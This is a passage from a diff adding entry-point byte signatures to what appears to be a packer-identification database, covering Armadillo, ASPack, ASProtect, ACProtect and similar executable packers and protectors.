+signature = 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38
+ep_only = true
+
+[Armadillo v2.52b2]
+signature = 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.53b3]
+signature = 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.xx (CopyMem II)]
+signature = 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82
+ep_only = true
+
+[Armadillo v2.5x - v2.6x]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.60]
+signature = 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84
+ep_only = true
+
+[Armadillo v2.60b1]
+signature = 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC
+ep_only = true
+
+[Armadillo v2.60b2]
+signature = 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C
+ep_only = true
+
+[Armadillo v2.60a]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4
+ep_only = true
+
+[Armadillo v2.60c]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.61]
+signature = 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C
+ep_only = true
+
+[Armadillo v2.65b1]
+signature = 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.75a]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v2.85]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v3.00]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9
+ep_only = true
+
+[Armadillo v3.00a]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo v3.01, v3.05]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9 75 02 EB 15 EB 33 C9 75 18 7A 0C 70 0E EB 0D E8 72 0E 79 F1 FF 15 00 79 09 74 F0 EB 87 DB 7A F0 A0 33 61 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 A0 8B 04 24 EB 03 7A 29 E9 C6 00 90 C3 E8 70 F0 87 D2 71 07 E9 00 40 8B DB 7A 11 EB 08 E9 EB F7 EB C3 E8 7A E9 70 DA 7B D1 71 F3 E9 7B
+ep_only = true
+
+[Armadillo v3.01 - v3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Armadillo v3.10]
+signature = 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1 44 00 33 F6 56 E8 72 16 00 00 59 85 C0 75 08 6A 1C E8 B0 00 00 00 59 89 75 FC E8 3D 13 00 00 FF 15 30 40 44 00 A3 84 B7 44 00 E8 FB 11 00 00 A3 E0 A1 44 00 E8 A4 0F 00 00 E8 E6 0E 00 00 E8 4E F6 FF FF 89 75 D0 8D 45 A4 50 FF 15 38 40 44 00 E8 77 0E 00 00 89 45 9C F6 45 D0 01 74 06 0F B7 45 D4 EB 03 6A 0A 58 50 FF 75 9C 56 56 FF 15 7C 41 44 00 50 E8 49 D4 FE FF 89 45 A0 50 E8 3C F6 FF FF 8B 45 EC 8B 08 8B 09 89 4D 98 50 51 E8 B5 0C 00 00 59 59 C3 8B 65 E8 FF 75 98 E8 2E F6 FF FF 83 3D E8 A1 44 00 01 75 05
+ep_only = true
+
+[Armadillo v3.xx]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58
+ep_only = true
+
+[Armadillo 3.6x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD AB 76
+ep_only = true
+
+[Armadillo 3.7x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 B8 3B 01 00 00 03 C5 33 DB 81 C3 01 01 01 01 31 18 81 38 78 54 00 00 74 04 31 18 EB EC
+ep_only = true
+
+[APatch GUI v1.1]
+signature = 52 31 C0 E8 FF FF FF FF
+ep_only = true
+
+[ASPack v1.00b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44
+ep_only = true
+
+[ASPack v1.01b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44
+ep_only = true
+
+[ASPack v1.02a]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF
+ep_only = true
+
+[ASPack v1.02b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43
+ep_only = true
+
+[ASPack v1.02b]
+signature = 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5
+ep_only = true
+
+[ASPack v1.03b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43
+ep_only = true
+
+[ASPack v1.04b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D
+ep_only = true
+
+[ASPack v1.05b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 75 00 E9
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 90 75 00 E9
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 90 90 75 00 E9
+ep_only = true
+
+[ASPack v1.061b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43
+ep_only = true
+
+[ASPack v1.07b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE
+ep_only = true
+
+[ASPack v1.07b (DLL)]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 90 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 90 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 90 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.02]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72
+ep_only = true
+
+[ASPack v1.08.x]
+signature = 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E
+ep_only = true
+
+[ASPack v1.08.04]
+signature = 60 E8 41 06 00 00 EB 41
+ep_only = true
+
+[ASPack v2.xx]
+signature = A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95
+ep_only = true
+
+[ASPack v2.000]
+signature = 60 E8 70 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.001]
+signature = 60 E8 72 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.1]
+signature = 60 E8 72 05 00 00 EB 33 87 DB 90 00
+ep_only = true
+
+[ASPack v2.11]
+signature = 60 E9 3D 04 00 00
+ep_only = true
+
+[ASPack v2.11b]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00
+ep_only = true
+
+[ASPack v2.11c]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00
+ep_only = true
+
+[ASPack v2.11d]
+signature = 60 E8 02 00 00 00 EB 09 5D 55
+ep_only = true
+
+[ASPack v2.12]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB
+ep_only = true
+
+[ASPack v2.12]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01
+ep_only = true
+
+[ASPack v2.xx]
+signature = A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 78 03 79 01 ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[ASProtect vx.x]
+signature = 90 60 ?? ?? ?? 00 00
+ep_only = true
+
+[ASProtect vx.x]
+signature = 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASProtect v1.0]
+signature = 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D
+ep_only = true
+
+[ASProtect v1.1]
+signature = 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE
+ep_only = true
+
+[ASProtect v1.1 MTE]
+signature = 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9
+ep_only = true
+
+[ASProtect v1.1 MTEb]
+signature = 90 60 E9 ?? 04
+ep_only = true
+
+[ASProtect v1.1 MTEc]
+signature = 90 60 E8 1B ?? ?? ?? E9 FC
+ep_only = true
+
+[ASProtect v1.1 BRS]
+signature = 60 E9 ?? 05
+ep_only = true
+
+[ASProtect v1.2]
+signature = 68 01 ?? ?? ?? C3
+ep_only = true
+
+[ASProtect v1.2x]
+signature = 00 00 68 01 ?? ?? ?? C3 AA
+ep_only = true
+
+[ASProtect v1.2x (New Strain)]
+signature = 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3
+ep_only = true
+
+[ASProtect v1.23 RC1]
+signature = 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3
+ep_only = true
+
+[ASPR Stripper v2.x unpacked]
+signature = BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC
+ep_only = true
+
+[Blade Joiner v1.5]
